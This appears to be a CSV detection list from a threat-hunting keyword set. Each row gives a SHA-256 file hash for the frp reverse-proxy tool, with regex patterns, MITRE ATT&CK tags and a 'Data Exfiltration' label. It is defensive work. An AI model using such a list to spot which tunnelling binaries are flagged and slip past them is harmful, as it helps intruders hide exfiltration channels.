"*18ee2a78c352eeceb07d55ba572955af64b14282914fe77edf632baf4ce0f967*",".{0,1000}18ee2a78c352eeceb07d55ba572955af64b14282914fe77edf632baf4ce0f967.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*19ca9f2b318ea2efbe9f2b213c2edd68de54c7ed35dc3f291146c67374d8c57d*",".{0,1000}19ca9f2b318ea2efbe9f2b213c2edd68de54c7ed35dc3f291146c67374d8c57d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*1a1a729fe607c59dae787bc5322efcf8cc5a9e87623c6d10e2a08531829bb9fb*",".{0,1000}1a1a729fe607c59dae787bc5322efcf8cc5a9e87623c6d10e2a08531829bb9fb.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*1a527c78ae25fa3e393d70fbfcea5b928ca96a689d8e82477f1b0db0cfc51e76*",".{0,1000}1a527c78ae25fa3e393d70fbfcea5b928ca96a689d8e82477f1b0db0cfc51e76.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*1a8d2c5bfe3a0367068cdf890b025258e5614c3fef308985c001500902692817*",".{0,1000}1a8d2c5bfe3a0367068cdf890b025258e5614c3fef308985c001500902692817.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*1b3c61129cf7b45ad41a6b297f4425b9e700cf6302c8969232c7587ae7e727d9*",".{0,1000}1b3c61129cf7b45ad41a6b297f4425b9e700cf6302c8969232c7587ae7e727d9.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*1ca8187c73c3c75ace29675193659f9d6ddff3e5ddf2131f49f156844ca7d778*",".{0,1000}1ca8187c73c3c75ace29675193659f9d6ddff3e5ddf2131f49f156844ca7d778.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*1cda556f00b20f5b575ba40f83d8a007a8fa3308ef502c62fb7510989c3b7b10*",".{0,1000}1cda556f00b20f5b575ba40f83d8a007a8fa3308ef502c62fb7510989c3b7b10.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*1d5b17f54911bc22816b0d72b32c258b259eb912d9d0484fdc949a315f5a5d42*",".{0,1000}1d5b17f54911bc22816b0d72b32c258b259eb912d9d0484fdc949a315f5a5d42.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*1e5b997597bacce1d971b83416c2f8c9cde0cbd294e6b11d91a3939f9c6356a9*",".{0,1000}1e5b997597bacce1d971b83416c2f8c9cde0cbd294e6b11d91a3939f9c6356a9.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*1f1eefdf6a9ade3923edcd716c56941f2755848a4bd97167aaa1ceebfed95194*",".{0,1000}1f1eefdf6a9ade3923edcd716c56941f2755848a4bd97167aaa1ceebfed95194.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*1fe64b366408022e4d61c1e37f64e268f7e72f4d351425df36c35fb1cfc534fd*",".{0,1000}1fe64b366408022e4d61c1e37f64e268f7e72f4d351425df36c35fb1cfc534fd.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*200244a2c1bc9e186f875c23d0b78c9ab59a88052f4f4132e5c28a70fdc356b6*",".{0,1000}200244a2c1bc9e186f875c23d0b78c9ab59a88052f4f4132e5c28a70fdc356b6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*214801dc012036d847beecbb5c2a03f64bfc50d601f79da86a4a783fc0323273*",".{0,1000}214801dc012036d847beecbb5c2a03f64bfc50d601f79da86a4a783fc0323273.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*21b32cdaf6e4c74a88a0b6c3c377a3d40a23f73c0313625fa63ba4a6542616fe*",".{0,1000}21b32cdaf6e4c74a88a0b6c3c377a3d40a23f73c0313625fa63ba4a6542616fe.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*21d0ed799e2d277a941a92a68b69a1ad4cdfe058fbdc6cb6141fff2c81421c57*",".{0,1000}21d0ed799e2d277a941a92a68b69a1ad4cdfe058fbdc6cb6141fff2c81421c57.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*220583e20edd98369dbe929d215a387ceea937b0e0637f62558506b2a6c603a2*",".{0,1000}220583e20edd98369dbe929d215a387ceea937b0e0637f62558506b2a6c603a2.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*22c7719b9a9d0ba2a43e85623677983dc550957a9f1d855994eb33d2e4db913e*",".{0,1000}22c7719b9a9d0ba2a43e85623677983dc550957a9f1d855994eb33d2e4db913e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*22df14e317c351bda4bfaf256c46b6ec281304135ea24c00bb2a71a5e14d4f22*",".{0,1000}22df14e317c351bda4bfaf256c46b6ec281304135ea24c00bb2a71a5e14d4f22.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*2330aca22b29fd0298adffe2e57f8eeea5837f09abdcbf11b58c128249d2f89f*",".{0,1000}2330aca22b29fd0298adffe2e57f8eeea5837f09abdcbf11b58c128249d2f89f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*23705712274935b9b223412bf731ecd672dcc8b5d0c11a39372aacedaa6a66a4*",".{0,1000}23705712274935b9b223412bf731ecd672dcc8b5d0c11a39372aacedaa6a66a4.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*2379c3dc7bf783334051c06aec97ffb50007c9d17572aae45500f07c764ab99a*",".{0,1000}2379c3dc7bf783334051c06aec97ffb50007c9d17572aae45500f07c764ab99a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*23bafd6bf4ac0e631b37bcdc68827f4b36f06c3dcf0bd754f5d0f9acb4606a3b*",".{0,1000}23bafd6bf4ac0e631b37bcdc68827f4b36f06c3dcf0bd754f5d0f9acb4606a3b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*24395170dfc41544eceeb78529c8de5b57b65250c27a02e058cd013e6f66097f*",".{0,1000}24395170dfc41544eceeb78529c8de5b57b65250c27a02e058cd013e6f66097f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*24fccce2e9c6684480bfd8ac0e9ea3e36d4203922fa5a39ae9f63bc0542f68f5*",".{0,1000}24fccce2e9c6684480bfd8ac0e9ea3e36d4203922fa5a39ae9f63bc0542f68f5.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*25431755a121c12dab3c28fec18eaef027a73aa5e9780b33f6801e152e42ab36*",".{0,1000}25431755a121c12dab3c28fec18eaef027a73aa5e9780b33f6801e152e42ab36.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*26acab3487be8980460ef86f0fdc7a446cfdadab02a5a0b27dc760ecce15ffc2*",".{0,1000}26acab3487be8980460ef86f0fdc7a446cfdadab02a5a0b27dc760ecce15ffc2.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*26c48aa4fa4458ad29d0de364904e24be40424d4f6c37005c2c2d9c6e41e2b06*",".{0,1000}26c48aa4fa4458ad29d0de364904e24be40424d4f6c37005c2c2d9c6e41e2b06.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*26eb992318437fad2d122ef76cfb3086f1339201486a1cdec910fe1a457ac383*",".{0,1000}26eb992318437fad2d122ef76cfb3086f1339201486a1cdec910fe1a457ac383.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*275b254a20dfda754d6aba28d335a392df74150d6945d2da20a7c5718dc2c001*",".{0,1000}275b254a20dfda754d6aba28d335a392df74150d6945d2da20a7c5718dc2c001.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*2809d84eb3f9bbc8bb73596d8826e112ebb455aa6228ff0eeff28dc6264ef6e6*",".{0,1000}2809d84eb3f9bbc8bb73596d8826e112ebb455aa6228ff0eeff28dc6264ef6e6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*291fa7918aa575802ced2fb77e45f33a3cf7fc4b5c27c4ac31a68b2506c50a30*",".{0,1000}291fa7918aa575802ced2fb77e45f33a3cf7fc4b5c27c4ac31a68b2506c50a30.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*2ab7b66c09391d9d76bd7a4818e85fb3818a10a46c91a804b982d7d4c9fddce3*",".{0,1000}2ab7b66c09391d9d76bd7a4818e85fb3818a10a46c91a804b982d7d4c9fddce3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*2c02d8f219e83bea4bb4c9ddf1222bdabc068f656992e967dc702e70a1aafd80*",".{0,1000}2c02d8f219e83bea4bb4c9ddf1222bdabc068f656992e967dc702e70a1aafd80.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*2d07711a0e24e3da968ad69aeeb458854572788e7869d276fcfb1189c824f9ff*",".{0,1000}2d07711a0e24e3da968ad69aeeb458854572788e7869d276fcfb1189c824f9ff.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*2df23e00a1d18a2291f17cbea17c1e4981e43ed09de3608197bb9a62c104c553*",".{0,1000}2df23e00a1d18a2291f17cbea17c1e4981e43ed09de3608197bb9a62c104c553.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*2e1a85c3cfa7cbbcb8747f53de4d7c913cd8ace7475988d823ca0e30bdcfa44e*",".{0,1000}2e1a85c3cfa7cbbcb8747f53de4d7c913cd8ace7475988d823ca0e30bdcfa44e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*2e935829f4623f148f3d97424f8863452ac19cf2edc1a659af7500428b894b47*",".{0,1000}2e935829f4623f148f3d97424f8863452ac19cf2edc1a659af7500428b894b47.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*2fae90ae2544f8b46582cfb7d46984d837b193601b35aa9d63c2f4f52007e32b*",".{0,1000}2fae90ae2544f8b46582cfb7d46984d837b193601b35aa9d63c2f4f52007e32b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*30199cd67bbed08c65f86c2420f0967491cad2ec791c97936666bc930d65e73e*",".{0,1000}30199cd67bbed08c65f86c2420f0967491cad2ec791c97936666bc930d65e73e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*30b14705cdfcc4fbc654b55863d110a99deaa92a1490561e8dfd84326f9a9e9c*",".{0,1000}30b14705cdfcc4fbc654b55863d110a99deaa92a1490561e8dfd84326f9a9e9c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*3262dee2fa68eb8d9428d209b2e87c2293d007529898850874b19707088c416e*",".{0,1000}3262dee2fa68eb8d9428d209b2e87c2293d007529898850874b19707088c416e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*32665745aaf03d263a9ce87f0ea7a17eb3476328c25c1a1fcccd0925934f7313*",".{0,1000}32665745aaf03d263a9ce87f0ea7a17eb3476328c25c1a1fcccd0925934f7313.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*33893a93b57e6509132b4d6ae29f3e8a1f4c105c21746f0f0f036df0cf8d1979*",".{0,1000}33893a93b57e6509132b4d6ae29f3e8a1f4c105c21746f0f0f036df0cf8d1979.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*33e46384b3caa71163ac79470de2af0cca5f8ea7593a9c9ea4e714dd66c099f5*",".{0,1000}33e46384b3caa71163ac79470de2af0cca5f8ea7593a9c9ea4e714dd66c099f5.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*351b90825fb48695f36208f0e6cfbbd53f9539306119b5ca0aeb949bd255066a*",".{0,1000}351b90825fb48695f36208f0e6cfbbd53f9539306119b5ca0aeb949bd255066a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*35386af9e43ed1948faa7037050573eda3299d4a11061734fce5f4be51c56dd3*",".{0,1000}35386af9e43ed1948faa7037050573eda3299d4a11061734fce5f4be51c56dd3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*36ea25323b263a1ac1d300a2bd8267905eaa7d752fd9e7d7b4ec40f836c737a6*",".{0,1000}36ea25323b263a1ac1d300a2bd8267905eaa7d752fd9e7d7b4ec40f836c737a6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*3961db6d3c5951da49b40cfdae22c8fd53ea87a2ff97245d8aadd4d4206c6fea*",".{0,1000}3961db6d3c5951da49b40cfdae22c8fd53ea87a2ff97245d8aadd4d4206c6fea.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*3b9f8b80f13f20194490851b076186124b67b9a7845b32e5e035ae4aed2e45dc*",".{0,1000}3b9f8b80f13f20194490851b076186124b67b9a7845b32e5e035ae4aed2e45dc.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*3c4e769a29f03bcc9e998adcd1281142abfb5ff1dd66da5a435830a1cff34217*",".{0,1000}3c4e769a29f03bcc9e998adcd1281142abfb5ff1dd66da5a435830a1cff34217.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*3c582f611716c77db5e4f69823fc72572006608f63d9859dea598f0dfc74ed0b*",".{0,1000}3c582f611716c77db5e4f69823fc72572006608f63d9859dea598f0dfc74ed0b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*3c9e03e28899ba18e42f51006f7d94192fbae009885fd91cfc75b354cffebf58*",".{0,1000}3c9e03e28899ba18e42f51006f7d94192fbae009885fd91cfc75b354cffebf58.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*3cc79f9fc44300aed80988b31845328b428c0999572eb7f1df949eccee0f518e*",".{0,1000}3cc79f9fc44300aed80988b31845328b428c0999572eb7f1df949eccee0f518e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*3cd7ec9209b973520d47d784a09a368bfb9e2bb195f3c543ae5311720249e315*",".{0,1000}3cd7ec9209b973520d47d784a09a368bfb9e2bb195f3c543ae5311720249e315.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*3ce4df319c7ea35f8cfa13d1e03a0309fc4f57aeaaa02d05fb9fd560443e67ba*",".{0,1000}3ce4df319c7ea35f8cfa13d1e03a0309fc4f57aeaaa02d05fb9fd560443e67ba.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*3f75d981d58670ce7e0e3f5ead2bd3359cdd1f33b96da726c62013567a884639*",".{0,1000}3f75d981d58670ce7e0e3f5ead2bd3359cdd1f33b96da726c62013567a884639.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
